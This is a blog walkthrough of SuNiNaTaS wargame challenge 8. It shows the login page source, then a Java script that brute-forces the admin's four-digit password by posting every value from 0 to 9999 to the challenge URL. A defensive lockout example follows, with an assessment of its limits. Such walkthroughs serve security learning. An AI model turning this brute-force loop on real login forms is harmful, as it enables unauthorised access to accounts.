[SuNiNaTaS] No. 8

by Hevton 2020. 12. 6.

Start screen

View source


<!DOCTYPE html>

<html>
<head>
    <title>Game 08</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="shortcut icon" href="/static/img/game.ico" />
</head>
<body>
    <form method="post" action="./web08.asp">
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <table width="240" cellpadding="0" cellspacing="0" align="center">
            <tr height="30">
                <td width="50%" class="table_top" align="center">
                    <input type="button" name="main_btn" value="main" style="width: 60" onclick="location.href = '/'"></td>
                <td width="50%" class="table_top" align="center">
                    <input type="button" name="main_btn" value="Back" style="width: 60" onclick="history.back()"></td>
            </tr>
            <tr height="30" class="table_main">
                <td width="120" align="center" bgcolor="cccccc"><font size="2"><b>ID</b></font></td>
                <td width="120" align="center" bgcolor="cccccc">
                    <input type="text" name="id" style="width: 90"></td>
            </tr>
            <tr height="30" class="table_main">
                <td align="center" bgcolor="cccccc"><font size="2"><b>PW</b></font></td>
                <td align="center" bgcolor="cccccc">
                    <input type="password" name="pw" style="width: 90" maxlength="4"></td>
            </tr>
            <tr height="30">
                <td colspan="2" align="center" class="table_top" bgcolor="cccccc">
                    <input type="button" name="btn" value="Login" onclick="submit()" size="20"></td>
            </tr>
            <tr class="table_main" height="30">
                <td colspan="2" align="center" bgcolor="cccccc">Password Incorrect!</td>
            </tr>
        </table>
    </form>
</body>
</html>


<!-- Hint : Login 'admin' Password in 0~9999 -->
<!-- M@de by 2theT0P -->

According to the hint, the password is somewhere in 0~9999.

So we can just brute-force it.

[JAVA]

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;

public class httppost {
    public static void main(String args[]) throws Exception {

        // Try every candidate from the hint (0~9999) as the admin password
        for (int j = 0; j < 10000; j++) {
            URL url = new URL("http://suninatas.com/challenge/web08/web08.asp");
            HttpURLConnection hc = (HttpURLConnection) url.openConnection();

            // "본인세션" is a placeholder: put your own session cookie values here
            hc.addRequestProperty("Cookie", "ASP.NET_SessionId=본인세션; ASPSESSIONIDCABBSAQA=본인세션");
            hc.addRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            hc.setRequestMethod("POST");
            hc.setDoInput(true);
            hc.setDoOutput(true);

            // Same form fields as the login page: id and pw
            String param = "id=admin&pw=" + j;

            // Send the form body; try-with-resources closes the stream
            try (OutputStream opstream = hc.getOutputStream()) {
                opstream.write(param.getBytes(StandardCharsets.UTF_8));
                opstream.flush();
            }

            // Read the whole response page
            StringBuilder sb = new StringBuilder();
            try (BufferedReader br = new BufferedReader(
                    new InputStreamReader(hc.getInputStream(), StandardCharsets.UTF_8))) {
                String s;
                while ((s = br.readLine()) != null)
                    sb.append(s);
            }

            // A failed login shows "Password Incorrect!"; anything else means j is the password
            if (sb.indexOf("Incorrect") == -1) {
                System.out.println(j);
                break;
            }
        }
    }
}
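
Seen from the server's side, the loop above only works because nothing counts failed logins. Below is a per-account lockout run against the same request pattern, added here as an example (not the challenge's code or the author's; the class name, thresholds and sample password are assumptions):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.HashMap;
import java.util.Map;

// Added example: per-account lockout in front of a 4-digit password check.
// All names, the thresholds and the sample password are constructed.
public class LoginThrottle {
    static final int MAX_FAILURES = 5;                 // failures allowed before a lockout
    static final long LOCK_MILLIS = 15 * 60 * 1000L;   // lockout length

    private static final class State { int failures; long lockedUntil; }
    private final Map<String, State> states = new HashMap<>();
    int evaluated = 0;                                 // guesses that reached the comparison

    synchronized boolean attempt(String id, String pw, String realPw, long now) {
        State s = states.computeIfAbsent(id, k -> new State());
        if (now < s.lockedUntil) return false;         // locked: reject without comparing
        evaluated++;
        boolean ok = MessageDigest.isEqual(            // constant-time comparison
                pw.getBytes(StandardCharsets.UTF_8), realPw.getBytes(StandardCharsets.UTF_8));
        if (ok) { s.failures = 0; return true; }
        if (++s.failures >= MAX_FAILURES) {            // too many misses: start a lockout
            s.failures = 0;
            s.lockedUntil = now + LOCK_MILLIS;
        }
        return false;
    }

    public static void main(String[] args) {
        String realPw = "7350";                        // constructed sample value
        LoginThrottle throttle = new LoginThrottle();
        long now = 0;                                  // simulated clock, in ms
        boolean found = false;
        // Same request pattern as the loop above: id=admin, pw=0..9999, one try per 10 ms
        for (int j = 0; j < 10000 && !found; j++, now += 10) {
            found = throttle.attempt("admin", String.valueOf(j), realPw, now);
        }
        System.out.println("found=" + found + " evaluated=" + throttle.evaluated);
        // A client that waits out every lockout still gets MAX_FAILURES guesses per window
        long worstCaseDays = (10000L / MAX_FAILURES) * LOCK_MILLIS / (24L * 60 * 60 * 1000);
        System.out.println("days to cover 0~9999 at that rate: " + worstCaseDays);
    }
}
```

The second number is the caveat: with only 10,000 possible passwords a lockout slows the search but does not make it infeasible, and a per-account lock also lets anyone lock out admin, so it is normally paired with a longer password.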

 
